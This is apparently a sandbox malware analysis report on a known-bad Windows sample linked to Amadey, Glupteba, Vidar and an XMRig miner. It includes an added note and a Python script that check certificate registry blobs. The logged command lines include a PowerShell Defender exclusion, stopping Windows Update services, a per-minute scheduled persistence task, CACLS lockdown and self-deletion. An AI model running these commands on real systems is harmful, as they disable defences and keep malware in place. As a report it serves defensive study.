Analysis Overview
SHA256
8765a0a92fa60c2a4d21ca073dcf805f320c2e3d07703b97638b38888fe25d23
Threat Level: Known bad
The file was found to be: Known bad.
Malicious Activity Summary
xmrig
Suspicious use of NtCreateUserProcessOtherParentProcess
Amadey
Fabookie
Glupteba payload
Glupteba
Vidar
Danabot
Detect Fabookie payload
Modifies boot configuration data using bcdedit
XMRig Miner payload
Downloads MZ/PE file
Modifies Windows Firewall
Possible attempt to disable PatchGuard
Stops running service(s)
Drops file in Drivers directory
Blocklisted process makes network request
.NET Reactor protector
UPX packed file
Drops startup file
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
Reads user/profile data of web browsers
Checks installed software on the system
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Enumerates connected drives
Drops file in System32 directory
Suspicious use of SetThreadContext
Launches sc.exe
Drops file in Windows directory
Drops file in Program Files directory
Unsigned PE
Enumerates physical storage devices
Program crash
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Kills process with taskkill
Modifies system certificate store
Enumerates system info in registry
Suspicious behavior: EnumeratesProcesses
Modifies data under HKEY_USERS
Checks processor information in registry
Uses Task Scheduler COM API
Creates scheduled task(s)
Suspicious behavior: LoadsDriver
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-10-04 22:00
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-10-04 22:00
Reported
2023-10-04 22:03
Platform
win7-20230831-en
Max time kernel
18s
Max time network
149s
Command Line
Signatures
Amadey
Danabot
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Fabookie
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Vidar
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible attempt to disable PatchGuard
Stops running service(s)
.NET Reactor protector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5KBrTyNqjkzkfvnblop9vXu.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\k4RZBA7IbOJzP9tFcB0Uxzr8.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I9fjH7BPaqhRIbdsZsuw44gH.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X2YqWH1H43WyVCsftFGf25fs.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8Q07bsmA2SFivlZEMcwdn3hb.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\32QePm4KyaXGR23aqiWCYXU7.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aqKNOYnM2WwyugEQZLP2WH2k.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\krf1bY6s7oSG5lwGiK0yR19v.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hfWzyh2UY8ErRZQrt8QdGnrZ.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EFlDBBbXluGJT7fUQupu2wBz.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Pictures\iI4FE5DOdYGnsqgfJvFzKbNA.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\FykH2HsVfDnnj7oZVpqHE25N.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\walat23dy3PjMc1F7wbJfEd7.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\EqY1yU2BuPoern4L1Clp7qEo.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\ghj5tC29p41ay41weXgZ4WtI.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\ebu3UllRuMr9MdnUccCb3KDw.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\u8iy3TCdGZHM8tCb1WqBJgR8.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-AEPFU.tmp\a46CknyPHlvkEaN9CZpK7aBo.tmp | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\FLnOhZMhkxBwS6yPdhkegb32.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\1UHcLGYJC6WmkejoMRN5dfRU.exe | N/A |
Loads dropped DLL
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2408 set thread context of 2264 | N/A | C:\Users\Admin\AppData\Local\Temp\file.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = (blob data omitted) | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (blob data omitted) | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = (blob data omitted) | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = (blob data omitted) | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = (blob data omitted) | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |

Note on this signature: the four thumbprints above are widely deployed public roots (D4DE20D0... Baltimore CyberTrust Root, CABD2A79... ISRG Root X1, A8985D3A... DigiCert Global Root CA, DAC9024F... DST Root CA X3), and the two Blob values shown decode to the DST Root CA X3 certificate (issuer "Digital Signature Trust Co.", valid 2000-09-30 to 2021-09-30, serial 44:af:b0:80:d6:a3:27:ba:89:30:39:86:2e:f8:40:6b). Taken together with the apps.identrust.com traffic in the Network section and the Windows 7 platform, this pattern is consistent with crypt32's AuthRoot auto-update populating the store when RegAsm.exe (hosting the injected payload) made its first HTTPS connections, not with the sample installing a root of its own. Treat the signature as low-value for this sample unless a thumbprint outside the Microsoft trusted root program appears.
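To check what a SystemCertificates\...\Blob value actually contains rather than trusting the signature name, here is an added example (written for this page; it is not part of the sandbox report or its tooling). It parses the property-list layout Windows uses for these values, a sequence of records each made of a little-endian DWORD property ID, a DWORD that is 1 in every record observed here, a DWORD length and the property bytes, using the property-ID constants from wincrypt.h. It runs on the first DAC9...7C13 Blob from the table above, copied verbatim and split at record and DER boundaries for readability, and cross-checks the SHA-1 of the embedded certificate against both the stored CERT_SHA1_HASH_PROP_ID property and the registry key name.

```python
import hashlib
import struct

# Property IDs from wincrypt.h that occur in this sample's Blob values.
CERT_SHA1_HASH_PROP_ID = 3
CERT_ENHKEY_USAGE_PROP_ID = 9
CERT_FRIENDLY_NAME_PROP_ID = 11
CERT_SIGNATURE_HASH_PROP_ID = 15
CERT_KEY_IDENTIFIER_PROP_ID = 20
CERT_CERT_PROP_ID = 32

# First Blob written under AuthRoot\Certificates\DAC9...7C13 in the report above
# (copied verbatim; line breaks follow the record and DER element boundaries).
BLOB_HEX = (
    "0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d"  # prop 15: signature hash
    "0b000000010000001e000000"
    "440053005400200052006f006f0074002000430041002000580033000000"      # prop 11: friendly name, UTF-16LE
    "090000000100000016000000"
    "301406082b0601050507030406082b06010505070301"                      # prop 9: EKU sequence
    "140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910"  # prop 20: subject key identifier
    "1d00000001000000100000004558d512eecb27464920897de7b66053"          # prop 29: 16-byte hash
    "030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c13"  # prop 3: SHA-1 thumbprint
    "20000000010000004e030000"                                          # prop 32: certificate, 0x34e bytes
    "3082034a30820232a003020102021044afb080d6a327ba893039862ef8406b"    # Certificate, tbs, version, serial
    "300d06092a864886f70d0101050500"                                    # sha1WithRSAEncryption
    "303f31243022060355040a131b4469676974616c205369676e6174757265"      # issuer ...
    "20547275737420436f2e311730150603550403130e44535420526f6f7420"
    "4341205833"
    "301e170d3030303933303231313231395a170d3231303933303134303131355a"  # validity
    "303f31243022060355040a131b4469676974616c205369676e6174757265"      # subject ...
    "20547275737420436f2e311730150603550403130e44535420526f6f7420"
    "4341205833"
    "30820122300d06092a864886f70d01010105000382010f003082010a0282010100"  # SPKI header
    "dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c11814"  # RSA modulus ...
    "8be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8c"
    "e5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38"
    "b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f"
    "48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b"
    "6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec"
    "1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115"
    "023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d"
    "0203010001"                                                        # public exponent 65537
    "a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff04"  # extensions ...
    "0403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc415"
    "60858910"
    "300d06092a864886f70d0101050500"                                    # signature algorithm
    "0382010100"                                                        # BIT STRING header
    "a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d"  # signature ...
    "3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db"
    "6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e"
    "58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7"
    "167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f52648"
    "9a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc"
    "02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5"
    "b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510"
)


def parse_cert_blob(blob):
    """Walk the (propid, flags, length, data) records and return {propid: data}."""
    props = {}
    offset = 0
    while offset < len(blob):
        if offset + 12 > len(blob):
            raise ValueError("truncated property header at offset %d" % offset)
        prop_id, _flags, length = struct.unpack_from("<III", blob, offset)
        offset += 12
        if offset + length > len(blob):
            raise ValueError("property %d runs past end of blob" % prop_id)
        props[prop_id] = blob[offset:offset + length]
        offset += length
    return props


def describe_blob(blob_hex, registry_key_name):
    """Extract the certificate and verify it against the stored hash and key name."""
    props = parse_cert_blob(bytes.fromhex(blob_hex))
    cert = props[CERT_CERT_PROP_ID]
    thumbprint = hashlib.sha1(cert).hexdigest()
    stored = props[CERT_SHA1_HASH_PROP_ID].hex()
    name = props.get(CERT_FRIENDLY_NAME_PROP_ID, b"").decode("utf-16-le").rstrip("\x00")
    # Outer DER SEQUENCE must use a 2-byte length that covers the rest of the value.
    der_length_ok = (len(cert) >= 4 and cert[0] == 0x30 and cert[1] == 0x82
                     and int.from_bytes(cert[2:4], "big") == len(cert) - 4)
    return {
        "friendly_name": name,
        "thumbprint": thumbprint,
        "stored_sha1": stored,
        "key_matches": thumbprint == stored == registry_key_name.lower(),
        "cert_len": len(cert),
        "der_length_ok": der_length_ok,
        "property_ids": sorted(props),
    }


if __name__ == "__main__":
    info = describe_blob(BLOB_HEX, "DAC9024F54D8F6DF94935FB1732638CA6AD77C13")
    for key, value in info.items():
        print("%-14s %s" % (key, value))
```

Feed any Blob value and its key name into describe_blob; a mismatch between the computed thumbprint and the key name, or an unparsable record list, is the case worth escalating. The DER bytes can be handed to openssl x509 -inform DER for the full subject and validity once extracted.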
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\WsatConfig.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\WsatConfig.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\Pictures\iI4FE5DOdYGnsqgfJvFzKbNA.exe
"C:\Users\Admin\Pictures\iI4FE5DOdYGnsqgfJvFzKbNA.exe"
C:\Users\Admin\Pictures\FykH2HsVfDnnj7oZVpqHE25N.exe
"C:\Users\Admin\Pictures\FykH2HsVfDnnj7oZVpqHE25N.exe"
C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe
"C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe"
C:\Users\Admin\Pictures\walat23dy3PjMc1F7wbJfEd7.exe
"C:\Users\Admin\Pictures\walat23dy3PjMc1F7wbJfEd7.exe"
C:\Users\Admin\Pictures\ghj5tC29p41ay41weXgZ4WtI.exe
"C:\Users\Admin\Pictures\ghj5tC29p41ay41weXgZ4WtI.exe"
C:\Users\Admin\Pictures\EqY1yU2BuPoern4L1Clp7qEo.exe
"C:\Users\Admin\Pictures\EqY1yU2BuPoern4L1Clp7qEo.exe"
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
"C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe"
C:\Users\Admin\Pictures\ebu3UllRuMr9MdnUccCb3KDw.exe
"C:\Users\Admin\Pictures\ebu3UllRuMr9MdnUccCb3KDw.exe" --silent --allusers=0
C:\Users\Admin\Pictures\u8iy3TCdGZHM8tCb1WqBJgR8.exe
"C:\Users\Admin\Pictures\u8iy3TCdGZHM8tCb1WqBJgR8.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
C:\Users\Admin\AppData\Local\Temp\is-AEPFU.tmp\a46CknyPHlvkEaN9CZpK7aBo.tmp
"C:\Users\Admin\AppData\Local\Temp\is-AEPFU.tmp\a46CknyPHlvkEaN9CZpK7aBo.tmp" /SL5="$8001A,491750,408064,C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "Admin:N"&&CACLS "nhdues.exe" /P "Admin:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "Admin:N"&&CACLS "..\1ff8bec27e" /P "Admin:R" /E&&Exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "nhdues.exe" /P "Admin:N"
C:\Users\Admin\Pictures\FLnOhZMhkxBwS6yPdhkegb32.exe
"C:\Users\Admin\Pictures\FLnOhZMhkxBwS6yPdhkegb32.exe"
C:\Windows\SysWOW64\cacls.exe
CACLS "nhdues.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\cacls.exe
CACLS "..\1ff8bec27e" /P "Admin:N"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\1ff8bec27e" /P "Admin:R" /E
C:\Users\Admin\Pictures\1UHcLGYJC6WmkejoMRN5dfRU.exe
"C:\Users\Admin\Pictures\1UHcLGYJC6WmkejoMRN5dfRU.exe"
C:\Users\Admin\AppData\Local\Temp\is-04DMD.tmp\8758677____.exe
"C:\Users\Admin\AppData\Local\Temp\is-04DMD.tmp\8758677____.exe" /S /UID=lylal220
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\1130335503.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Users\Admin\AppData\Local\Temp\1130335503.exe
"C:\Users\Admin\AppData\Local\Temp\1130335503.exe"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "204195515407223645-332532506182008150120580824635124315601540113345344060515"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "FykH2HsVfDnnj7oZVpqHE25N.exe" /f & erase "C:\Users\Admin\Pictures\FykH2HsVfDnnj7oZVpqHE25N.exe" & exit
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "FykH2HsVfDnnj7oZVpqHE25N.exe" /f
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\system32\taskeng.exe
taskeng.exe {8AA18C1B-A578-48E8-AAED-20993D8C9F84} S-1-5-21-607259312-1573743425-2763420908-1000:NGTQGRML\Admin:Interactive:[1]
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
C:\Windows\System32\cmd.exe
